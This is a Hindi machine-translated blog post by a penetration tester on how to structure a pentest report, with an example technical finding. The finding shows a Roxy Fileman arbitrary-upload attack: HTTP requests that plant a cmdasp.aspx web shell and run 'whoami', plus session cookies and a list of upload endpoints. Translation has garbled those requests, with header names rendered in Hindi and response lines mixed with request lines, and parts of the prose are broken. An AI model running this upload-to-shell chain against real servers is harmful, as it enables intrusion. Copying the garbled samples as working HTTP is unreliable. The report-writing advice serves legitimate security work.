एक अच्छी पैठ परीक्षण रिपोर्ट कैसी दिखनी चाहिए?

एक अनुभवी पेनटेस्टर, वह जानता है कि एक अच्छी तरह से लिखित रिपोर्ट इस तथ्य की विशेषता है कि इसकी प्रस्तुति के बाद ग्राहक के पास कोई अतिरिक्त प्रश्न नहीं होता है। ऐसा करने के लिए, इसमें विभिन्न ऑडियंस के लिए जानकारी के साथ कम से कम चार बुनियादी अनुभाग होने चाहिए।

धारा 1: सामान्य जानकारी और आंकड़े

जबकि बग को ठीक करने के लिए एक प्रोग्रामर को सभी तकनीकी विवरणों की आवश्यकता हो सकती है, प्रबंधन उपयोग की गई प्रौद्योगिकियों और विशेष शब्दावली को नहीं समझ सकता है। इसके बजाय, उन्हें व्यापार जोखिम को समझने की जरूरत है। बिजनेस लीडर्स के लिए यह समझना जरूरी है कि उनकी कंपनियों के लिए सूचित फैसले लेने के लिए क्या दांव पर है । पूरी रिपोर्ट में निहित जानकारी का एक सुलभ सारांश जोखिम entiling की सही समझ सुनिश्चित करने के लिए आवश्यक है । इसके अलावा, पहले खंड में औपचारिक जानकारी होनी चाहिए, यानी क्या परीक्षण किया गया था और किस अनुमति के साथ, जब इसका परीक्षण किया गया था, परीक्षणों में भाग लिया, जिसके आदेश पर परीक्षण किए गए थे। नीचे दिया गया आंकड़ा इस जानकारी के साथ नमूना तालिकाओं को दिखाता है।

परीक्षण किया गया ऐपSXXX dXXX http://XXXXX
भूमिकाओं का परीक्षण किया गयाप्रशासक, उपयोगकर्ता
परीक्षण की तिथि30.10.2017 – 13.12.2017
परीक्षण की जगहव्रोकला (रिमोट)
प्रमुखमार्टिनएक्सएक्सएक्स
परीक्षक और रिपोर्ट लेखकमीकल Kędzior
दस्तावेज़ संस्करण1.0 (15.12.2017)

दृश्य संचार भी स्पष्ट रूप से पता चला सुरक्षा त्रुटियों का संदेश देने में मददगार हो सकता है । थोक डेटा की कल्पना करने में आपकी मदद करने के लिए सभी प्रकार के चार्ट और समान ग्राफिक तत्वों का उपयोग करें।


जोखिमों का आकलन करते समय, निम्नलिखित का पालन किया जाना चाहिए:

जोखिम = खतरा * घटना की संभावना * व्यापार पर प्रभाव।

जहां एक खतरा एक विशेष भेद्यता के साथ जुड़ा सामान्य जोखिम है। घटना की संभावना का मतलब है कि सुरक्षा त्रुटि का फायदा उठाना कितना मुश्किल है। व्यवसाय पर प्रभाव हमलावर के त्रुटि के उपयोग से जुड़े नुकसान को निर्धारित करता है। निम्नलिखित ग्राफिक एक तालिका प्रदान करता है जो भेद्यता डेटा के जोखिम का आकलन करने के लिए उपयोगी है। उदाहरण के लिए, यदि खतरा अधिक है और भेद्यता का फायदा उठाना बहुत आसान है (भेद्यता)-सी और प्रभाव औसत है-मध्यम, हमें कुल 24 अंक मिलते हैं, जिसका अर्थ है कि भेद्यता में औसत जोखिम होता है । एक अन्य आंकड़ा दिखाता है कि पता की गई कमजोरियों की मात्रा की कल्पना कैसे की जाए।

पता लगाया कमजोरियों की मात्रा की कल्पना करने के लिए कैसे
पता लगाया कमजोरियों की मात्रा की कल्पना करने के लिए कैसे

पता लगाया कमजोरियों की मात्रा की कल्पना करने के लिए कैसे

आपके जोखिम आकलन के आधार पर, रिपोर्ट प्राप्तकर्ता को पहले सबसे महत्वपूर्ण त्रुटियों को ठीक करना चाहिए। वे व्यापार के लिए सबसे बड़ा खतरा पैदा करते हैं और उच्च वित्तीय नुकसान में परिणाम कर सकते हैं ।


धारा 2: पता लगाया कमजोरियों का विवरण

अधिकांश प्रवेश परीक्षण रिपोर्ट किसी प्रकार की जोखिम मूल्यांकन प्रणाली का उपयोग करती हैं, लेकिन यह समझाने के लिए समय निकालना दुर्लभ है कि किसी दिए गए भेद्यता से जुड़े जोखिम क्या हैं। ग्राहक को मौजूदा सुरक्षा त्रुटियों के बारे में सूचित होने के बाद क्या कदम उठाने हैं, इसके बारे में त्वरित और सटीक निर्णय लेना चाहिए। इसमें अक्सर अतिरिक्त बजट की जरूरत होती है, जिसके लिए गैर-तकनीकी उच्च स्तरीय अधिकारियों से मंजूरी की जरूरत होती है ।


कठिन निर्णयों को आसान बनाने के लिए, इस तरह से पता लगाई गई कमजोरियों का वर्णन करें जो आपके व्यवसाय पर प्रभाव दिखाती है। उदाहरण के लिए, यदि एक महत्वपूर्ण भेद्यता का पता चला है जो किसी भी फ़ाइल को हेल्थकेयर पोर्टल पर स्थानांतरित करने की अनुमति दे सकता है, तो इसकी रिपोर्ट करने के दो तरीके हैं:

  • तकनीकी रूप से सटीक – एक्स का वेब एप्लिकेशन फ़ाइलों के हस्तांतरण को टाइप करके प्रतिबंधित नहीं करता है, जिससे एक भेद्यता पैदा होती है जो हमलावर को कोड को दूर से निष्पादित करने और आवेदन के विशेषाधिकारों को ऊंचा करने की अनुमति दे सकती है।
  • सटीक और प्रासंगिक दोनों – एक्स का वेब एप्लिकेशन फ़ाइल प्रकार द्वारा फ़ाइलों के हस्तांतरण को प्रतिबंधित नहीं करता है, एक भेद्यता पैदा करता है जो एक हमलावर को अवांछित कोड को दूर से निष्पादित करने और आवेदन में अपने विशेषाधिकारों को ऊंचा करने की अनुमति दे सकता है। इस मामले में, एक हमलावर किसी भी उपयोगकर्ता के मेडिकल रिकॉर्ड देख सकता है और आवेदन में एक प्रशासक के रूप में कार्य कर सकता है।

दूसरे तरीके से अधिक वजन है, न केवल तकनीकी पहलुओं की ओर इशारा करते हुए, लेकिन यह भी व्यापार पर प्रभाव के लिए । सबसे मूल्यवान रिपोर्ट उन है कि एक भाषा में सभी दर्शकों के लिए अपील कर रहे है कि लोगों को, विशेष रूप से नेतृत्व की स्थिति में, समझते हैं ।

धारा 3: मरम्मत सिफारिशें

सबसे महत्वपूर्ण चीजों में से एक है कि ग्राहक जो प्रवेश परीक्षण कमीशन पर निर्भर करता है पता चला सुरक्षा कमजोरियों के बाद की मरंमत है । इसे संभव बनाने के लिए, प्रवेश परीक्षक से यह संकेत मिलने की उम्मीद है कि पता की गई कमजोरियों का वर्णन करने के अलावा, पता लगाने वाली त्रुटियों से जुड़े जोखिमों की मरम्मत या उन्हें कैसे सुधारा जाए। यह अनुभाग मुख्य रूप से तकनीकी प्रशिक्षण वाले लोगों के लिए है जो सीधे आवेदन कोड, सर्वर विन्यास या डेटाबेस से संबंधित हैं। यह पाया सुरक्षा त्रुटियों को ठीक करने के तरीके का वर्णन बाहरी स्रोतों के लिए अतिरिक्त लिंक जोड़ने के लिए उपयोगी है । निम्नलिखित आंकड़ा विस्तृत संवेदनशील जानकारी प्रदर्शित करने वाली त्रुटि दिखाता है। इस डेटा में अक्सर तकनीकी जानकारी, कक्षाएं, त्रुटियों का कारण 10, सर्वर का सटीक संस्करण, या अनुप्रयोगों और विन्यास फ़ाइलों के सिस्टम पथ शामिल होते हैं।

विस्तृत संवेदनशील जानकारी प्रदर्शित करने वाली त्रुटि

निम्नलिखित एक त्रुटि के लिए एक उदाहरण सिफारिश है जो विस्तृत त्रुटि जानकारी प्रदर्शित करता है।

एक त्रुटि सिफारिश का उदाहरण जो विस्तृत त्रुटि जानकारी प्रदर्शित करता है


धारा 4: कमजोरियों का तकनीकी विवरण

अंतिम खंड में पाई गई कमजोरियों का तकनीकी विवरण होना चाहिए । डेवलपर्स के लिए यह समझना विशेष रूप से उपयोगी है कि एक बग क्या है और इसे करने के लिए आवश्यक चरणों का पुनर्निर्माण कैसे करें। यदि आपको समस्या के स्रोत का पता लगाने और बाद में सत्यापित करने की आवश्यकता है कि मरम्मत विधि प्रभावी है तो यह विशेष रूप से उपयोगी है।

निम्नलिखित सर्वर पर किसी भी फ़ाइल को अपलोड करने की संवेदनशीलता का एक विस्तृत तकनीकी विवरण है।


सर्वर/Content/Roxy_Fileman/एक फ़ाइल दर्शक है जो लॉग-इन उपयोगकर्ताओं को उचित अनुमतियों (परीक्षण प्रशासक खाता) के साथ उन्हें अपलोड करने की अनुमति देता है (सिस्टम पर आदेशों को निष्पादित करने वाली स्क्रिप्ट सहित):

फ़ाइल दर्शक जो लॉग-इन उपयोगकर्ताओं को उचित अनुमतियों (परीक्षण किए गए प्रशासक खाते) के साथ उन्हें अपलोड करने की अनुमति देता है (सिस्टम पर आदेशों को निष्पादित करने वाली स्क्रिप्ट सहित)

सिस्टम पर कमांड निष्पादित करने वाली स्क्रिप्ट सर्वर पर अपलोड करने के साथ अनुरोध करें:


पोस्ट/एडमिन/रॉक्सीफाइलमैन/प्रोसेसर्रेक्सिस्ट?a= अपलोड HTTP/1.1
होस्ट: XXXXX
यूजर-एजेंट: मोज़िला/5.0 (X11; लिनक्स x86_64; rv:45.0) छिपकली/20100101 Firefox/45.0
स्वीकार करें: पाठ/html, आवेदन/xhtml + xml, आवेदन/xml;q=0.9,*/*;q=0.8
स्वीकार करें-भाषा: एन-यूएस, एन;क्यू=0.5
स्वीकार करें-एनकोडिंग: जीजीआईपी, डिफ्लेट
रेफरर: http://XXXXX/Content/Roxy_Fileman/
कुकी: XXXXX = 32b8a4de-a83d-45c8-8471-927e301a9b69; XXXXX=AFD96B4B580D29A3CDFC11265B5B4C4A942D164F2
कनेक्शन: क्लोज
कैश-कंट्रोल: मैक्स-एज =0
कंटेंट-टाइप: मल्टीपार्ट/फॉर्म-डेटा; सीमा=---------------------------13949612691104534433104770617
सामग्री-लंबाई: 1861
-----------------------------13949612691104534433104770617
सामग्री-स्वभाव: फॉर्म-डेटा; नाम ="कार्रवाई"
अपलोड -----------------------------13949612691104534433104770617

सामग्री-स्वभाव: फॉर्म-डेटा; नाम ="d" -----------------------------13949612691104534433104770617

सामग्री-स्वभाव: फॉर्म-डेटा; नाम ="फ़ाइलें [];;filename="cmdasp.aspx"Content-Type:
एप्लीकेशन/ऑक्टेट-स्ट्रीम
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>


एक सफल स्क्रिप्ट अपलोड प्रतिक्रिया के साथ सर्वर प्रतिक्रिया:

पोस्ट/एडमिन/रॉक्सीफाइलमैन/प्रोसेसर्रेक्सिस्ट?a= अपलोड HTTP/1.1
होस्ट: XXXXX
यूजर-एजेंट: मोज़िला/5.0 (X11; लिनक्स x86_64; rv:45.0) छिपकली/20100101 Firefox/45.0
HTTP/1.1 200 ठीक
कैश-कंट्रोल: निजी
सामग्री-प्रकार: पाठ/html; charset=utf-8
सर्वर: माइक्रोसॉफ्ट-IIS/10.0
X-AspNetMvc-संस्करण: 5.1
X-AspNet-संस्करण: 4.0.30319
सेट-कुकी: XXXXX=32b8a4de-a83d-45c8-8471-927e301a9b69; 09-नवंबर-2018 16:53:07 GMT; path=/; HttpOnly
X-संचालित-द्वारा: ASP.NET
तिथि: Thu, 09 Nov 2017 16:53:07 GMT
कनेक्शन: बंद
सामग्री-लंबाई: 60

अपलोड किए गए संसाधन को सर्वर/मीडिया/अपलोड/फाइल नाम
पर प्राधिकरण के बिना एक्सेस किया जा सकता है

निष्पादित करने के लिए कमांड के साथ सर्वर करने का अनुरोध – वर्तमान सिस्टम उपयोगकर्ता को प्रदर्शित करने वाला whoami:


पोस्ट/मीडिया/अपलोड/cmdasp.aspx HTTP/1.1
मेजबान: XXXXX
उपयोगकर्ता-एजेंट: मोजिला/5.0 (X11; लिनक्स x86_64; rv:45.0) छिपकली/20100101 Firefox/45.0
स्वीकार करें: पाठ/html, आवेदन/xhtml +xml, आवेदन/xml;q=0.9,*/*;q=0.8 स्वीकार करें-भाषा: एन-यूएस, एन;क्यू=0.5
स्वीकार करें-एनकोडिंग: जीजीआईपी, Deflate
रेफरर: http://XXXXX/media/uploaded/cmdasp.aspx
कुकी: XXXXX = 32b8a4de-a83d-45c8-8471-927e301a9b69;
XXXXX=AFD96B4B580D29A3CDFC11265B5B4C4A942D164F2D
कनेक्शन: क्लोज
कंटेंट-टाइप: एप्लीकेशन/एक्स-www-फॉर्म-यूरेनकोडेड
कंटेंट-लेंथ: 290
[...]
EVENTVALIDATION=%2FwEdAANRJmrtf23QBZNDbQYsx5itsAmaVIY7AayhB9duwcnk2J
DuMxrvKtMBUSvskgfELw WmgNGW8Lr4a8NezI%2FkHrIsB%2FLodYxPpo9ud%2FbHu4w%3D%3D&txtArg=whoami&testing=excute

सर्वर प्रतिक्रिया आदेश के निष्पादन की पुष्टि:

सर्वर प्रतिक्रिया कमांड निष्पादन की पुष्टि

फाइलों को अपलोड करने के तंत्र की पहचान निम्नलिखित पतों पर की जाती है:

  • /एडमिन/चालान/चालान
  • /एडमिन/चालान/चालान ी सूची
  • /एडमिन/न्यूजलेटर/ग्रुपसब्सक्रिप्शनलिस्ट
  • /एडमिन/न्यूजलेटर/सब्सक्रिप्शनलिस्ट
  • /Content/Roxy_Fileman/index.html



सुरक्षा त्रुटियों को पूरी तरह से समाप्त नहीं किया जाएगा । वे सुरक्षा विकास जीवनचक्र प्रक्रिया (जिसमें विभिन्न सुरक्षा परीक्षण और स्रोत कोड ऑडिट शामिल हैं) के कार्यान्वयन के बावजूद माइक्रोसॉफ्ट उत्पादों दोनों में दिखाई देते हैं, और लिनक्स गिरी में।वे ओपन सोर्स प्रोजेक्ट्स और उन दोनों में पाए जा सकते हैं जहां कोड बंद है। एक महत्वपूर्ण मुद्दा यह है कि प्रवेश परीक्षण आयोजित करते समय संवेदनशीलता का पता न लगाना इस तथ्य का पर्याय नहीं है कि वे वहां नहीं हैं । इसका मतलब सिर्फ इतना है कि सीमित समय में और कुछ साधनों, ज्ञान और अनुभव का इस्तेमाल करते हुए पेनेस्टर उन्हें नहीं ढूंढ पाए। फिर भी, प्रवेश परीक्षणों के परिणामों को देखते हुए, आवेदन की गुणवत्ता के बारे में निष्कर्ष निकाले जा सकते हैं, या अधिक महत्वपूर्ण रूप से खोजी गई त्रुटियों के मामले में, पता लगाएं कि वे क्या जोखिम उठाते हैं।

Chcesz wiedzieć więcej?

Zapisz się i bądź informowany o nowych postach (zero spamu!). Dodatkowo otrzymasz, moją prywatną listę 15 najbardziej przydatnych narzędzi (wraz z krótkim opisem), których używam przy testach penetracyjnych.

Nigdy nie podam, nie wymienię ani nie sprzedam Twojego adresu e-mail. W każdej chwili możesz zrezygnować z subskrypcji.

Bookmark the permalink.

प्रातिक्रिया दे

आपका ईमेल पता प्रकाशित नहीं किया जाएगा. आवश्यक फ़ील्ड चिह्नित हैं *